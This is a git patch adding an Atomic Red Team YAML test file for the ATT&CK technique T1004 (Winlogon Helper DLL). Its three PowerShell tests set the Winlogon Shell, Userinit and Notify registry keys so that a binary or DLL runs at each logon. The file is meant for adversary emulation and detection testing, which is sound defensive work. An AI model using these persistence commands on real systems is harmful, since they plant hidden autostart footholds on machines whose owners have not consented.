From 0f576dd03fbe63b4a1a30c4e7f0e4abfaf85bb00 Mon Sep 17 00:00:00 2001
From: Tony M Lambert <ForensicITGuy@users.noreply.github.com>
Date: Thu, 13 Dec 2018 10:06:28 -0600
Subject: [PATCH] T1004 Winlogon Helper DLLs (#427)

---
 atomics/T1004/T1004.yaml | 59 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 59 insertions(+)
 create mode 100644 atomics/T1004/T1004.yaml

diff --git a/atomics/T1004/T1004.yaml b/atomics/T1004/T1004.yaml
new file mode 100644
index 00000000..63e470e1
--- /dev/null
+++ b/atomics/T1004/T1004.yaml
@@ -0,0 +1,59 @@
+---
+attack_technique: T1004
+display_name: Winlogon Helper DLL
+
+atomic_tests:
+- name: Winlogon Shell Key Persistence - PowerShell
+  description: |
+    PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    binary_to_execute:
+      description: Path of binary to execute
+      type: Path
+      default: C:\Windows\System32\cmd.exe
+
+  executor:
+    name: powershell
+    command: |
+      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
+
+- name: Winlogon Userinit Key Persistence - PowerShell
+  description: |
+    PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    binary_to_execute:
+      description: Path of binary to execute
+      type: Path
+      default: C:\Windows\System32\cmd.exe
+
+  executor:
+    name: powershell
+    command: |
+      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+
+- name: Winlogon Notify Key Logon Persistence - PowerShell
+  description: |
+    PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    binary_to_execute:
+      description: Path of notification package to execute
+      type: Path
+      default: C:\Windows\Temp\atomicNotificationPackage.dll
+
+  executor:
+    name: powershell
+    command: |
+      New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
+      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force